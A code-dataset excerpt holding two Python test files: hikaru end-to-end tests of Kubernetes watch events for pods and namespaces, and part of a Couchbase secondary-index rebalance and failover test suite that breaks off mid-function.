source
stringlengths 3
86
| python
stringlengths 75
1.04M
|
|---|---|
watch_rel_1_17.py
|
#
# Copyright (c) 2021 Incisive Technology Ltd
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
from os import getcwd
from pathlib import Path
from threading import Thread
import time
from kubernetes import config
from hikaru import set_global_default_release, load_full_yaml
from hikaru.model.rel_1_17 import Pod, Namespace, ObjectMeta
from hikaru.watch import Watcher, MultiplexingWatcher, WatchEvent
set_global_default_release('rel_1_17')
config.load_kube_config(config_file="/etc/rancher/k3s/k3s.yaml")
cwd = getcwd()
if cwd.endswith('/e2e'):
# then we're running in the e2e directory itself
base_path = Path('../test_yaml')
else:
# assume we're running in the parent directory
base_path = Path('test_yaml')
del cwd
def test01():
"""
test01: simple watcher test; timeout after load
"""
w = Watcher(Pod, timeout_seconds=1)
count = 0
for we in w.stream(manage_resource_version=True, quit_on_timeout=True):
assert isinstance(we.obj, Pod), f'got a {we.obj.__name__}, not a Pod'
count += 1
assert count > 0, 'got no Pod events'
def make_namespace(name):
def do_it(nsname):
time.sleep(0.1)
ns = Namespace(metadata=ObjectMeta(name=nsname))
ns.create()
time.sleep(0.1)
ns.delete()
t = Thread(target=do_it, args=(name,))
t.start()
def make_pod(name, nsname):
def do_it(podname, ns):
time.sleep(0.1)
path = base_path / "core-pod.yaml"
pod: Pod = load_full_yaml(path=str(path))[0]
pod.metadata.name = podname
pod.metadata.namespace = ns
pod.create()
time.sleep(0.1)
pod.delete()
t = Thread(target=do_it, args=(name, nsname))
t.start()
def drain(w: Watcher) -> int:
highest_rv = 0
for we in w.stream(manage_resource_version=True, quit_on_timeout=True):
rv = int(we.obj.metadata.resourceVersion)
if rv > highest_rv:
highest_rv = rv
return highest_rv
def test02():
"""
test02: watch for namespace events, create/delete a namespace
"""
w = Watcher(Namespace)
ns_name = "test02-watch"
highest_rv = drain(w)
w = Watcher(Namespace, resource_version=highest_rv)
make_namespace(ns_name)
for we in w.stream(manage_resource_version=True, quit_on_timeout=True):
assert isinstance(we.obj, Namespace)
if we.obj.metadata.name == ns_name and we.etype == "DELETED":
w.stop()
def test03():
"""
test03: check we get all the events we expect for a create/delete
"""
w = Watcher(Namespace)
highest_rv = drain(w)
w.update_resource_version(highest_rv)
ns_name = 'test03-watcher'
expected_types = {'ADDED', 'MODIFIED', 'DELETED'}
make_namespace(ns_name)
seen_types = set()
for we in w.stream(manage_resource_version=True, quit_on_timeout=False):
assert isinstance(we.obj, Namespace)
if we.obj.metadata.name != ns_name:
continue
seen_types.add(we.etype)
if we.etype == 'DELETED':
w.stop()
assert expected_types == seen_types
def dump(we: WatchEvent):
print(f"e:{we.etype} t:{we.obj.kind} n:{we.obj.metadata.name} ns:"
f"{we.obj.metadata.namespace}")
def test04():
"""
test04: check basic mux operation
"""
ns_name = 'test04-watch'
podname = 'test04-pod'
nsw = Watcher(Namespace)
hns = drain(nsw)
nsw.update_resource_version(hns)
pw = Watcher(Pod, namespace=ns_name)
hp = drain(pw)
pw.update_resource_version(hp)
mux = MultiplexingWatcher()
mux.add_watcher(nsw)
mux.add_watcher(pw)
expected = {'ADDED', 'MODIFIED', 'DELETED'}
pod_seen = set()
ns_seen = set()
make_namespace(ns_name)
make_pod(podname, ns_name)
stopped_mux = False
for we in mux.stream(manage_resource_version=True, quit_on_timeout=False):
if we.obj.kind == 'Pod' and we.obj.metadata.namespace == ns_name:
pod_seen.add(we.etype)
elif we.obj.kind == 'Namespace' and we.obj.metadata.name == ns_name:
ns_seen.add(we.etype)
if 'DELETED' in pod_seen and 'DELETED' in ns_seen:
stopped_mux = True
mux.stop()
assert stopped_mux, "the mux exited via timeout or loss of watchers"
assert expected == ns_seen, f'Not enough namespace events: {expected-ns_seen}'
assert expected == pod_seen, f'Not enough pod events: {expected-pod_seen}'
def test05():
"""
test05: check adding a Watcher on the fly to the mux
"""
ns_name = 'test05-watch'
podname = 'test05-pod'
nsw = Watcher(Namespace)
hns = drain(nsw)
nsw.update_resource_version(hns)
pw = Watcher(Pod, namespace=ns_name)
hp = drain(pw)
pw.update_resource_version(hp)
mux = MultiplexingWatcher()
mux.add_watcher(nsw)
expected = {'ADDED', 'MODIFIED', 'DELETED'}
pod_seen = set()
ns_seen = set()
make_namespace(ns_name)
make_pod(podname, ns_name)
stopped_mux = False
first = True
for we in mux.stream(manage_resource_version=True, quit_on_timeout=False):
if first:
first = False
mux.add_watcher(pw)
if we.obj.kind == 'Pod' and we.obj.metadata.namespace == ns_name:
pod_seen.add(we.etype)
elif we.obj.kind == 'Namespace' and we.obj.metadata.name == ns_name:
ns_seen.add(we.etype)
if 'DELETED' in pod_seen and 'DELETED' in ns_seen:
stopped_mux = True
mux.stop()
assert stopped_mux, "the mux exited via timeout or loss of watchers"
assert expected == ns_seen, f'Not enough namespace events: {expected-ns_seen}'
assert expected == pod_seen, f'Not enough pod events: {expected-pod_seen}'
if __name__ == "__main__":
for k, v in dict(globals()).items():
if callable(v) and k.startswith('test'):
print(f'running {k}')
try:
v()
except Exception as e:
print(f'{k} failed with {e}')
|
gsi_rebalance_2i.py
|
from datetime import datetime
import random
import threading
from membase.api.rest_client import RestConnection, RestHelper
from queue import Queue
from lib import testconstants
from lib.couchbase_helper.query_definitions import SQLDefinitionGenerator, QueryDefinition, RANGE_SCAN_TEMPLATE
from lib.couchbase_helper.tuq_generators import TuqGenerators
from lib.remote.remote_util import RemoteMachineShellConnection
from pytests.fts.fts_base import NodeHelper
from pytests.query_tests_helper import QueryHelperTests
from .base_2i import BaseSecondaryIndexingTests, log
#class SecondaryIndexingRebalanceTests(BaseSecondaryIndexingTests, QueryHelperTests, NodeHelper,
# EnterpriseBackupRestoreBase):
class SecondaryIndexingRebalanceTests(BaseSecondaryIndexingTests, QueryHelperTests, NodeHelper):
#class SecondaryIndexingRebalanceTests(BaseSecondaryIndexingTests):
def setUp(self):
#super(SecondaryIndexingRebalanceTests, self).setUp()
super().setUp()
self.rest = RestConnection(self.servers[0])
self.n1ql_server = self.get_nodes_from_services_map(service_type="n1ql", get_all_nodes=False)
self.create_primary_index = False
self.retry_time = self.input.param("retry_time", 300)
self.rebalance_out = self.input.param("rebalance_out", False)
self.sleep_time = self.input.param("sleep_time", 1)
self.num_retries = self.input.param("num_retries", 1)
self.build_index = self.input.param("build_index", False)
self.rebalance_out = self.input.param("rebalance_out", False)
shell = RemoteMachineShellConnection(self.servers[0])
info = shell.extract_remote_info().type.lower()
if info == 'linux':
if self.nonroot:
nonroot_base_path = "/home/{0}".format(self.master.ssh_username)
self.cli_command_location = nonroot_base_path + \
testconstants.LINUX_COUCHBASE_BIN_PATH
else:
self.cli_command_location = testconstants.LINUX_COUCHBASE_BIN_PATH
elif info == 'windows':
self.cmd_ext = ".exe"
self.cli_command_location = testconstants.WIN_COUCHBASE_BIN_PATH_RAW
elif info == 'mac':
self.cli_command_location = testconstants.MAC_COUCHBASE_BIN_PATH
else:
raise Exception("OS not supported.")
self.rand = random.randint(1, 1000000000)
self.alter_index = self.input.param("alter_index", None)
if self.ansi_join:
self.rest.load_sample("travel-sample")
def tearDown(self):
super(SecondaryIndexingRebalanceTests, self).tearDown()
def test_gsi_rebalance_out_indexer_node(self):
self.run_operation(phase="before")
if self.ansi_join:
expected_result = self.ansi_join_query(stage="pre_rebalance")
self.sleep(30)
map_before_rebalance, stats_map_before_rebalance = self._return_maps()
nodes_out_list = self.get_nodes_from_services_map(service_type="index", get_all_nodes=False)
# rebalance out a node
rebalance = self.cluster.async_rebalance(self.servers[:self.nodes_init], [], [nodes_out_list])
if self.ansi_join:
self.ansi_join_query(stage="post_rebalance", expected=expected_result)
self.run_operation(phase="during")
reached = RestHelper(self.rest).rebalance_reached()
self.assertTrue(reached, "rebalance failed, stuck or did not complete")
rebalance.result()
self.sleep(30)
map_after_rebalance, stats_map_after_rebalance = self._return_maps()
if self.ansi_join:
self.ansi_join_query()
self.n1ql_helper.verify_indexes_redistributed(map_before_rebalance, map_after_rebalance,
stats_map_before_rebalance, stats_map_after_rebalance, [],
[nodes_out_list])
self.run_operation(phase="after")
def test_gsi_rebalance_in_indexer_node(self):
self.run_operation(phase="before")
self.sleep(30)
map_before_rebalance, stats_map_before_rebalance = self._return_maps()
# rebalance in a node
services_in = ["index"]
rebalance = self.cluster.async_rebalance(self.servers[:self.nodes_init], [self.servers[self.nodes_init]], [],
services=services_in)
reached = RestHelper(self.rest).rebalance_reached()
self.assertTrue(reached, "rebalance failed, stuck or did not complete")
rebalance.result()
self.sleep(30)
map_after_rebalance, stats_map_after_rebalance = self._return_maps()
# validate the results
self.n1ql_helper.verify_indexes_redistributed(map_before_rebalance, map_after_rebalance,
stats_map_before_rebalance, stats_map_after_rebalance,
[self.servers[self.nodes_init]], [])
self.run_operation(phase="after")
def test_gsi_rebalance_swap_rebalance(self):
self.run_operation(phase="before")
if self.ansi_join:
expected_result = self.ansi_join_query(stage="pre_rebalance")
self.sleep(30)
map_before_rebalance, stats_map_before_rebalance = self._return_maps()
nodes_out_list = self.get_nodes_from_services_map(service_type="index", get_all_nodes=False)
to_add_nodes = [self.servers[self.nodes_init]]
to_remove_nodes = [nodes_out_list]
services_in = ["index"]
log.info(self.servers[:self.nodes_init])
# do a swap rebalance
rebalance = self.cluster.async_rebalance(self.servers[:self.nodes_init], to_add_nodes, [], services=services_in)
if self.ansi_join:
self.ansi_join_query(stage="post_rebalance", expected=expected_result)
self.run_operation(phase="during")
reached = RestHelper(self.rest).rebalance_reached()
self.assertTrue(reached, "rebalance failed, stuck or did not complete")
rebalance.result()
rebalance = self.cluster.async_rebalance(self.servers[:self.nodes_init + 1], [], to_remove_nodes)
index_server = self.get_nodes_from_services_map(service_type="index", get_all_nodes=False)
for i in range(20):
output = self.rest.list_indexer_rebalance_tokens(server=index_server)
if "rebalancetoken" in output:
log.info(output)
break
self.sleep(2)
if i == 19 and "rebalancetoken" not in output:
self.log.warning("rebalancetoken was not returned by /listRebalanceTokens during gsi rebalance")
self.run_async_index_operations(operation_type="query")
reached = RestHelper(self.rest).rebalance_reached()
self.assertTrue(reached, "rebalance failed, stuck or did not complete")
rebalance.result()
self.sleep(30)
map_after_rebalance, stats_map_after_rebalance = self._return_maps()
# validate the results
if self.ansi_join:
self.ansi_join_query()
self.n1ql_helper.verify_indexes_redistributed(map_before_rebalance, map_after_rebalance,
stats_map_before_rebalance, stats_map_after_rebalance,
to_add_nodes, to_remove_nodes, swap_rebalance=True)
self.run_operation(phase="after")
def test_cbindex_move_after_rebalance_in(self):
self.run_operation(phase="before")
self.sleep(30)
map_before_rebalance, stats_map_before_rebalance = self._return_maps()
indexes, no_of_indexes = self._get_indexes_in_move_index_format(map_before_rebalance)
log.info(indexes)
to_add_nodes = [self.servers[self.nodes_init]]
services_in = ["index"]
index_server = self.get_nodes_from_services_map(service_type="index", get_all_nodes=False)
rebalance = self.cluster.async_rebalance(self.servers[:self.nodes_init], to_add_nodes, [], services=services_in)
reached = RestHelper(self.rest).rebalance_reached()
self.assertTrue(reached, "rebalance failed, stuck or did not complete")
rebalance.result()
self._cbindex_move(index_server, self.servers[self.nodes_init], indexes, alter_index=self.alter_index)
if not self.alter_index:
self.wait_for_cbindex_move_to_complete(self.servers[self.nodes_init], no_of_indexes)
else:
# Allow index movement via alter index to be completed.
self.sleep(120)
self.run_operation(phase="during")
map_after_rebalance, stats_map_after_rebalance = self._return_maps()
# validate the results
self.n1ql_helper.verify_indexes_redistributed(map_before_rebalance, map_after_rebalance,
stats_map_before_rebalance, stats_map_after_rebalance,
to_add_nodes, [], swap_rebalance=True)
self.run_operation(phase="after")
def test_cbindex_move_with_mutations_and_query(self):
index_server = self.get_nodes_from_services_map(service_type="index", get_all_nodes=False)
self.run_operation(phase="before")
self.sleep(30)
map_before_rebalance, stats_map_before_rebalance = self._return_maps()
indexes, no_of_indexes = self._get_indexes_in_move_index_format(map_before_rebalance)
log.info(indexes)
to_add_nodes = [self.servers[self.nodes_init]]
services_in = ["index"]
rebalance = self.cluster.async_rebalance(self.servers[:self.nodes_init], to_add_nodes, [], services=services_in)
rebalance.result()
self._cbindex_move(index_server, self.servers[self.nodes_init], indexes,
alter_index=self.alter_index)
self.run_operation(phase="during")
tasks = self.async_run_doc_ops()
for task in tasks:
task.result()
if not self.alter_index:
self.wait_for_cbindex_move_to_complete(self.servers[self.nodes_init], no_of_indexes)
else:
# Allow index movement via alter index to be completed.
self.sleep(120)
map_after_rebalance, stats_map_after_rebalance = self._return_maps()
# validate the results
self.n1ql_helper.verify_indexes_redistributed(map_before_rebalance, map_after_rebalance,
stats_map_before_rebalance, stats_map_after_rebalance,
to_add_nodes, [], swap_rebalance=True)
self.run_operation(phase="after")
def test_create_index_when_gsi_rebalance_in_progress(self):
index_server = self.get_nodes_from_services_map(service_type="index", get_all_nodes=False)
self.run_operation(phase="before")
self.sleep(30)
services_in = ["index"]
index_name_prefix = "random_index_" + str(random.randint(100000, 999999))
# rebalance in a node
rebalance = self.cluster.async_rebalance(self.servers[:self.nodes_init], [self.servers[self.nodes_init]], [],
services=services_in)
rebalance.result()
# rebalance out a node
rebalance = self.cluster.async_rebalance(self.servers[:self.nodes_init], [], [index_server])
self.sleep(4)
try:
# when rebalance is in progress, run create index
self.n1ql_helper.run_cbq_query(
query="CREATE INDEX " + index_name_prefix + " ON default(age) USING GSI WITH {'defer_build': True};",
server=self.n1ql_node)
except Exception as ex:
log.info(str(ex))
if "Create index or Alter replica cannot proceed due to rebalance in progress" not in str(ex):
self.fail("index creation did not fail with expected error : {0}".format(str(ex)))
else:
self.fail("index creation did not fail as expected")
self.run_operation(phase="during")
reached = RestHelper(self.rest).rebalance_reached()
self.assertTrue(reached, "rebalance failed, stuck or did not complete")
rebalance.result()
def test_drop_index_when_gsi_rebalance_in_progress(self):
index_server = self.get_nodes_from_services_map(service_type="index", get_all_nodes=False)
self.run_operation(phase="before")
self.sleep(30)
services_in = ["index"]
# rebalance in a node
rebalance = self.cluster.async_rebalance(self.servers[:self.nodes_init], [self.servers[self.nodes_init]], [],
services=services_in)
rebalance.result()
# rebalance out a node
rebalance = self.cluster.async_rebalance(self.servers[:self.nodes_init], [], [index_server])
self.sleep(15)
try:
# when rebalance is in progress, run drop index
self._drop_index(self.query_definitions[0], self.buckets[0])
except Exception as ex:
log.info(str(ex))
if "Indexer Cannot Process Drop Index - Rebalance In Progress" not in str(ex):
self.fail("drop index did not fail with expected error : {0}".format(str(ex)))
else:
log.info("drop index did not fail, check if the index is dropped in the retry mechanism")
self.run_operation(phase="during")
reached = RestHelper(self.rest).rebalance_reached()
self.assertTrue(reached, "rebalance failed, stuck or did not complete")
rebalance.result()
self.sleep(120)
# Validate that the index is dropped after retry
try:
self._drop_index(self.query_definitions[0], self.buckets[0])
except Exception as ex:
log.info(str(ex))
if "not found" not in str(ex):
self.fail("drop index did not fail with expected error : {0}".format(str(ex)))
else:
self.fail("drop index did not fail, It should have as it would already have been deleted by retry")
def test_bucket_delete_and_flush_when_gsi_rebalance_in_progress(self):
index_server = self.get_nodes_from_services_map(service_type="index", get_all_nodes=False)
self.run_operation(phase="before")
self.sleep(30)
map_before_rebalance, stats_map_before_rebalance = self._return_maps()
services_in = ["index"]
# rebalance in a node
rebalance = self.cluster.async_rebalance(self.servers[:self.nodes_init], [self.servers[self.nodes_init]], [],
services=services_in)
rebalance.result()
# rebalance out a node
rebalance = self.cluster.async_rebalance(self.servers[:self.nodes_init], [], [index_server])
self.sleep(2)
# try deleting and flushing bucket during gsi rebalance
status1 = self.rest.delete_bucket(bucket=self.buckets[0])
if status1:
self.fail("deleting bucket succeeded during gsi rebalance")
try:
status2 = self.rest.flush_bucket(bucket=self.buckets[0])
except Exception as ex:
if "unable to flush bucket" not in str(ex):
self.fail("flushing bucket failed with unexpected error message")
self.run_operation(phase="during")
reached = RestHelper(self.rest).rebalance_reached()
self.assertTrue(reached, "rebalance failed, stuck or did not complete")
rebalance.result()
map_after_rebalance, stats_map_after_rebalance = self._return_maps()
# validate the results
self.n1ql_helper.verify_indexes_redistributed(map_before_rebalance, map_after_rebalance,
stats_map_before_rebalance, stats_map_after_rebalance,
[self.servers[self.nodes_init]], [index_server],
swap_rebalance=True)
self.run_operation(phase="after")
def test_gsi_rebalance_works_when_querying_is_in_progress(self):
index_server = self.get_nodes_from_services_map(service_type="index", get_all_nodes=False)
self.run_operation(phase="before")
self.sleep(30)
map_before_rebalance, stats_map_before_rebalance = self._return_maps()
services_in = ["index"]
# rebalance in a node
rebalance = self.cluster.async_rebalance(self.servers[:self.nodes_init], [self.servers[self.nodes_init]], [],
services=services_in)
rebalance.result()
# start querying
t1 = threading.Thread(target=self.run_async_index_operations, args=("query",))
t1.start()
# rebalance out a indexer node when querying is in progress
rebalance = self.cluster.async_rebalance(self.servers[:self.nodes_init], [], [index_server])
reached = RestHelper(self.rest).rebalance_reached()
self.assertTrue(reached, "rebalance failed, stuck or did not complete")
rebalance.result()
t1.join()
map_after_rebalance, stats_map_after_rebalance = self._return_maps()
# validate the results
self.n1ql_helper.verify_indexes_redistributed(map_before_rebalance, map_after_rebalance,
stats_map_before_rebalance, stats_map_after_rebalance,
[self.servers[self.nodes_init]], [index_server],
swap_rebalance=True)
self.run_operation(phase="after")
def test_gsi_rebalance_works_when_mutations_are_in_progress(self):
index_server = self.get_nodes_from_services_map(service_type="index", get_all_nodes=False)
self.run_operation(phase="before")
self.sleep(30)
map_before_rebalance, stats_map_before_rebalance = self._return_maps()
services_in = ["index"]
# rebalance in a node
rebalance = self.cluster.async_rebalance(self.servers[:self.nodes_init], [self.servers[self.nodes_init]], [],
services=services_in)
rebalance.result()
# start kv mutations
results = []
tasks = self.async_run_doc_ops()
for task in tasks:
results.append(threading.Thread(target=task.result()))
for result in results:
result.start()
# rebalance out a indexer node when kv mutations are in progress
rebalance = self.cluster.async_rebalance(self.servers[:self.nodes_init], [], [index_server])
reached = RestHelper(self.rest).rebalance_reached()
self.assertTrue(reached, "rebalance failed, stuck or did not complete")
rebalance.result()
for result in results:
result.join()
self.sleep(60)
map_after_rebalance, stats_map_after_rebalance = self._return_maps()
# validate the results
self.n1ql_helper.verify_indexes_redistributed(map_before_rebalance, map_after_rebalance,
stats_map_before_rebalance, stats_map_after_rebalance,
[self.servers[self.nodes_init]], [index_server],
swap_rebalance=True)
self.run_operation(phase="after")
def test_build_index_when_gsi_rebalance_in_progress(self):
index_server = self.get_nodes_from_services_map(service_type="index", get_all_nodes=False)
self._create_index_with_defer_build()
self.sleep(30)
services_in = ["index"]
# rebalance in a node
rebalance = self.cluster.async_rebalance(self.servers[:self.nodes_init], [self.servers[self.nodes_init]], [],
services=services_in)
rebalance.result()
# rebalance out a node
rebalance = self.cluster.async_rebalance(self.servers[:self.nodes_init], [], [index_server])
self.sleep(2)
exceptions = self._build_index()
if not [x for x in exceptions if 'Indexer Cannot Process Build Index - Rebalance In Progress' in x]:
self.fail(
"build index did not fail during gsi rebalance with expected error message: See MB-23452 for more details")
reached = RestHelper(self.rest).rebalance_reached()
self.assertTrue(reached, "rebalance failed, stuck or did not complete")
rebalance.result()
self.run_operation(phase="after")
def test_hard_failover_and_full_recovery_and_gsi_rebalance(self):
index_server = self.get_nodes_from_services_map(service_type="index", get_all_nodes=False)
self.run_operation(phase="before")
if self.ansi_join:
expected_result = self.ansi_join_query(stage="pre_rebalance")
self.sleep(30)
map_before_rebalance, stats_map_before_rebalance = self._return_maps()
# failover the indexer node
failover_task = self.cluster.async_failover([self.master], failover_nodes=[index_server], graceful=False)
failover_task.result()
self.sleep(30)
# do a full recovery and rebalance
add_back_ip = index_server.ip
if add_back_ip.startswith("["):
hostname = add_back_ip[add_back_ip.find("[") + 1:add_back_ip.find("]")]
add_back_ip = hostname
self.rest.set_recovery_type('ns_1@' + add_back_ip, "full")
self.rest.add_back_node('ns_1@' + add_back_ip)
reb1 = self.cluster.rebalance(self.servers[:self.nodes_init], [], [])
if self.ansi_join:
self.ansi_join_query(stage="post_rebalance", expected=expected_result)
self.run_operation(phase="during")
if reb1:
result = self.rest.monitorRebalance()
msg = "successfully rebalanced cluster {0}"
self.log.info(msg.format(result))
self.sleep(30)
map_after_rebalance, stats_map_after_rebalance = self._return_maps()
if self.ansi_join:
self.ansi_join_query()
self.n1ql_helper.verify_indexes_redistributed(map_before_rebalance, map_after_rebalance,
stats_map_before_rebalance, stats_map_after_rebalance,
[], [], )
self.run_operation(phase="after")
def test_hard_failover_and_delta_recovery_and_gsi_rebalance(self):
index_server = self.get_nodes_from_services_map(service_type="index", get_all_nodes=False)
if self.ansi_join:
expected_result = self.ansi_join_query(stage="pre_rebalance")
self.run_operation(phase="before")
self.sleep(30)
map_before_rebalance, stats_map_before_rebalance = self._return_maps()
# failover the indexer node
failover_task = self.cluster.async_failover([self.master], failover_nodes=[index_server], graceful=False)
failover_task.result()
self.sleep(30)
# do a delta recovery and rebalance
self.rest.set_recovery_type('ns_1@' + index_server.ip, "delta")
self.rest.add_back_node('ns_1@' + index_server.ip)
reb1 = self.cluster.rebalance(self.servers[:self.nodes_init], [], [])
if self.ansi_join:
self.ansi_join_query(stage="post_rebalance", expected=expected_result)
self.run_operation(phase="during")
if reb1:
result = self.rest.monitorRebalance()
msg = "successfully rebalanced cluster {0}"
self.log.info(msg.format(result))
self.sleep(30)
map_after_rebalance, stats_map_after_rebalance = self._return_maps()
if self.ansi_join:
self.ansi_join_query()
self.n1ql_helper.verify_indexes_redistributed(map_before_rebalance, map_after_rebalance,
stats_map_before_rebalance, stats_map_after_rebalance,
[], [], )
self.run_operation(phase="after")
def test_hard_failover_and_gsi_rebalance(self):
index_server = self.get_nodes_from_services_map(service_type="index", get_all_nodes=False)
self.run_operation(phase="before")
self.sleep(30)
services_in = ["index"]
# rebalance in a node
rebalance = self.cluster.async_rebalance(self.servers[:self.nodes_init], [self.servers[self.nodes_init]], [],
services=services_in)
rebalance.result()
# failover the indexer node which had all the indexes
failover_task = self.cluster.async_failover([self.master], failover_nodes=[index_server], graceful=False)
failover_task.result()
self.sleep(30)
# rebalance out the indexer node
reb1 = self.cluster.rebalance(self.servers[:self.nodes_init + 1], [], [index_server])
if reb1:
result = self.rest.monitorRebalance()
msg = "successfully rebalanced cluster {0}"
self.log.info(msg.format(result))
self.sleep(30)
map_after_rebalance, _ = self._return_maps()
self.assertEqual(len(list(map_after_rebalance.keys())), 0)
def test_graceful_failover_and_full_recovery_and_gsi_rebalance(self):
index_server = self.get_nodes_from_services_map(service_type="index", get_all_nodes=False)
if self.ansi_join:
expected_result = self.ansi_join_query(stage="pre_rebalance")
self.run_operation(phase="before")
self.sleep(30)
map_before_rebalance, stats_map_before_rebalance = self._return_maps()
# failover the indexer node
failover_task = self.cluster.async_failover([self.master], failover_nodes=[index_server], graceful=True)
failover_task.result()
self.sleep(240)
# do a full recovery and rebalance
self.rest.set_recovery_type('ns_1@' + index_server.ip, "full")
self.rest.add_back_node('ns_1@' + index_server.ip)
reb1 = self.cluster.rebalance(self.servers[:self.nodes_init], [], [])
if self.ansi_join:
self.ansi_join_query(stage="post_rebalance", expected=expected_result)
self.run_operation(phase="during")
if reb1:
result = self.rest.monitorRebalance()
msg = "successfully rebalanced cluster {0}"
self.log.info(msg.format(result))
self.sleep(30)
map_after_rebalance, stats_map_after_rebalance = self._return_maps()
if self.ansi_join:
self.ansi_join_query()
self.n1ql_helper.verify_indexes_redistributed(map_before_rebalance, map_after_rebalance,
stats_map_before_rebalance, stats_map_after_rebalance,
[], [], )
self.run_operation(phase="after")
def test_graceful_failover_and_delta_recovery_and_gsi_rebalance(self):
index_server = self.get_nodes_from_services_map(service_type="index", get_all_nodes=False)
if self.ansi_join:
expected_result = self.ansi_join_query(stage="pre_rebalance")
self.run_operation(phase="before")
self.sleep(30)
map_before_rebalance, stats_map_before_rebalance = self._return_maps()
# failover the indexer node
failover_task = self.cluster.async_failover([self.master], failover_nodes=[index_server], graceful=True)
failover_task.result()
self.sleep(120)
# do a delta recovery and rebalance
self.rest.set_recovery_type('ns_1@' + index_server.ip, "delta")
self.rest.add_back_node('ns_1@' + index_server.ip)
reb1 = self.cluster.rebalance(self.servers[:self.nodes_init], [], [])
if self.ansi_join:
self.ansi_join_query(stage="post_rebalance", expected=expected_result)
self.run_operation(phase="during")
if reb1:
result = self.rest.monitorRebalance()
msg = "successfully rebalanced cluster {0}"
self.log.info(msg.format(result))
self.sleep(30)
map_after_rebalance, stats_map_after_rebalance = self._return_maps()
if self.ansi_join:
self.ansi_join_query()
self.n1ql_helper.verify_indexes_redistributed(map_before_rebalance, map_after_rebalance,
stats_map_before_rebalance, stats_map_after_rebalance,
[], [], )
self.run_operation(phase="after")
def test_gsi_rebalance_works_with_mutations_query_in_progress(self):
index_server = self.get_nodes_from_services_map(service_type="index", get_all_nodes=False)
self.run_operation(phase="before")
self.sleep(30)
map_before_rebalance, stats_map_before_rebalance = self._return_maps()
services_in = ["index"]
# rebalance in a node
rebalance = self.cluster.async_rebalance(self.servers[:self.nodes_init], [self.servers[self.nodes_init]], [],
services=services_in)
rebalance.result()
# rebalance out a indexer node
rebalance = self.cluster.async_rebalance(self.servers[:self.nodes_init], [], [index_server])
# start kv mutations and query in parallel
results = []
tasks = self.async_run_doc_ops()
for task in tasks:
results.append(threading.Thread(target=task.result()))
for result in results:
result.start()
self.run_operation(phase="during")
reached = RestHelper(self.rest).rebalance_reached()
self.assertTrue(reached, "rebalance failed, stuck or did not complete")
rebalance.result()
for result in results:
result.join()
map_after_rebalance, stats_map_after_rebalance = self._return_maps()
# validate the results
self.n1ql_helper.verify_indexes_redistributed(map_before_rebalance, map_after_rebalance,
stats_map_before_rebalance, stats_map_after_rebalance,
[self.servers[self.nodes_init]], [index_server],
swap_rebalance=True)
self.run_operation(phase="after")
def test_gsi_rebalance_stop_rebalance_and_start_again(self):
index_server = self.get_nodes_from_services_map(service_type="index", get_all_nodes=False)
self.run_operation(phase="before")
self.sleep(30)
map_before_rebalance, stats_map_before_rebalance = self._return_maps()
services_in = ["index"]
# rebalance in a node
rebalance = self.cluster.async_rebalance(self.servers[:self.nodes_init], [self.servers[self.nodes_init]], [],
services=services_in)
rebalance.result()
# rebalance out a indexer node
rebalance = self.cluster.async_rebalance(self.servers[:self.nodes_init], [], [index_server])
# stop the rebalance
stopped = RestConnection(self.master).stop_rebalance(wait_timeout=self.wait_timeout // 3)
self.assertTrue(stopped, msg="unable to stop rebalance")
rebalance.result()
# start rebalance again
rebalance = self.cluster.async_rebalance(self.servers[:self.nodes_init], [], [index_server])
self.sleep(30)
self.run_operation(phase="during")
reached = RestHelper(self.rest).rebalance_reached()
self.assertTrue(reached, "rebalance failed, stuck or did not complete")
rebalance.result()
map_after_rebalance, stats_map_after_rebalance = self._return_maps()
# validate the results
self.n1ql_helper.verify_indexes_redistributed(map_before_rebalance, map_after_rebalance,
stats_map_before_rebalance, stats_map_after_rebalance,
[self.servers[self.nodes_init]], [index_server],
swap_rebalance=True)
self.run_operation(phase="after")
def test_verify_gsi_rebalance_does_not_work_during_create_drop_and_build_index(self):
index_server = self.get_nodes_from_services_map(service_type="index", get_all_nodes=False)
self.sleep(30)
services_in = ["index"]
self.run_operation(phase="before")
# rebalance in a node
rebalance = self.cluster.async_rebalance(self.servers[:self.nodes_init], [self.servers[self.nodes_init]],
[],
services=services_in)
rebalance.result()
tasks = self.async_run_doc_ops()
self.sleep(60)
# start create index, build index and drop index
# self._build_index(sleep=0)
for task in tasks:
task.result()
index_name_prefix = "random_index_" + str(
random.randint(100000, 999999))
create_index_query = "CREATE INDEX " + index_name_prefix + " ON default(address) USING GSI WITH {'num_replica': 1}"
t1 = threading.Thread(target=self._create_replica_index, args=(create_index_query,))
t1.start()
self.sleep(0.5)
# while create index is running ,rebalance out a indexer node
try:
rebalance = self.cluster.rebalance(self.servers[:self.nodes_init], [], [index_server])
rebalance.result()
except Exception as ex:
if "Rebalance failed. See logs for detailed reason. You can try again" not in str(ex):
self.fail("rebalance failed with some unexpected error : {0}".format(str(ex)))
else:
self.fail(
"rebalance did not fail during create index or create index completed before rebalance started")
t1.join()
# do a cbindex move after a indexer failure
# self.sleep(60)
# map_before_rebalance, stats_map_before_rebalance = self._return_maps()
# indexes, no_of_indexes = self._get_indexes_in_move_index_format(map_before_rebalance)
# self._cbindex_move(index_server, self.servers[self.nodes_init], indexes)
# self.wait_for_cbindex_move_to_complete(self.servers[self.nodes_init], no_of_indexes)
# self.run_operation(phase="during")
# map_after_rebalance, stats_map_after_rebalance = self._return_maps()
# # validate the results
# self.n1ql_helper.verify_indexes_redistributed(map_before_rebalance, map_after_rebalance,
# stats_map_before_rebalance, stats_map_after_rebalance,
# [self.servers[self.nodes_init]], [], swap_rebalance=True)
# index_servers = self.get_nodes_from_services_map(service_type="index", get_all_nodes=True)
